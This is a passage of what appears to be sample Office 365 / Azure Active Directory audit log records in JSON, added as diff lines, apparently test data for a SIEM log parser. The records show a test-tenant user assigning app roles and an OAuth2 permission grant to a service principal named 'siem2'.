"fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "siem2", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.0571467Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622817"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "db3ce560-1c2f-4c85-b305-55ad6476250f"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", 